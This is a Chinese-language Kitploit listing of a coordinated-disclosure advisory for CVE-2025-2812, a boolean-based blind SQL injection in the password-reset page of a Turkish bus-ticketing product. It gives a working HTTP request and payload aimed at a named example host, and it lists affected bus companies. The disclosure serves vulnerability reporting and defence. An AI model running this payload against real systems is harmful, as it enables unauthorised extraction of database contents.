Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-2812 — CVE-2025-2812 SQL注入 | Kitploit
工具/GitHubGitHub/sahici/cve-2025-2812
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试数据库安全
GitHubsahici/cve-2025-2812

CVE-2025-2812

CVE-2025-2812 SQL注入

查看仓库
41年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
网站
分享

CVE-2025-2812 — Mydata Bilişim Ltd. Şti 开发的“Bilet Satış Otomasyonu”中的 SQL 注入漏洞

📌 CVE-ID: CVE-2025-2812
📢 USOM 公告: tr-25-0099
🛡️ 漏洞类型: CWE-89 - SQL 注入(基于布尔值的盲注)
🏢 受影响产品: Bilet Satış Otomasyonu – Mydata Bilişim Ltd. Şti
🌐 示例目标 URL: https://otobusfirmasi.com.tr/otobus-bileti/SifremiUnuttum.php


🔍 漏洞概述

在“Bilet Satış Otomasyonu”产品中,密码重置页面(SifremiUnuttum.php)上的 "Adınızın ilk harfi"(ilkHarf)参数中发现了基于布尔值的盲 SQL 注入漏洞。此漏洞允许在无需用户名或密码的情况下从系统中窃取数据。

该漏洞涉及以下巴士公司的系统:

  • Balıkesir Uludağ
  • Kontur
  • Efe Tur
  • Kale Seyahat
  • +20 家公司

💥 PoC(概念验证)

📌 HTTP 请求:

root@kitploit:~
GET /otobus-bileti/SifremiUnuttumBilgi.php?TelefonNo=12313131231312313&ilkHarf=a')%20OR%20NOT%20LENGTH(LENGTH((SELECT%20SCHEMA_NAME%20FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT%200,1)))=1--%20wXyW HTTP/1.1
Host: otobusfirmasi.com.tr
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://otobusfirmasi.com.tr/otobus-bileti/SifremiUnuttum.php
Cookie: PHPSESSID=***************

🧪 使用的 Payload:

root@kitploit:~
TelefonNo=12313131231312313&ilkHarf=a')%20OR%20NOT%20LENGTH(LENGTH((SELECT%20SCHEMA_NAME%20FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT%200,1)))=1--%20wXyW

🧠 技术细节

  • 存在漏洞的参数: ilkHarf
  • 方法: 基于布尔值的盲 SQL 注入
  • 漏洞类型: SQL 命令中特殊元素的错误处理('SQL 注入')

🙏 致谢

我们在由“Mydata Bilişim Ltd. Şti”开发的“Bilet Satış Otomasyonu”产品中发现漏洞后,以 CVE-2025-2812 代码发布的此漏洞已通过厂商与 USOM 的协调予以公布。 我们很自豪能够在此过程中为网络安全社区做出贡献。

在漏洞报告之后,Mydata Bilişim Ltd. Şti 迅速执行了所有必要流程,关闭了相关安全漏洞并为其系统集成了额外的安全措施。我们对他们在过程中表现出的透明度、合作意识与责任感表示衷心感谢。

我们很自豪能够在此过程中为网络安全社区做出贡献。


📬 联系方式

如有任何疑问、反馈或合作需求,请通过以下方式与我联系:

  • 📧 电子邮件:[email protected]
  • 📷 Instagram:@yyasar.yasin

下载工具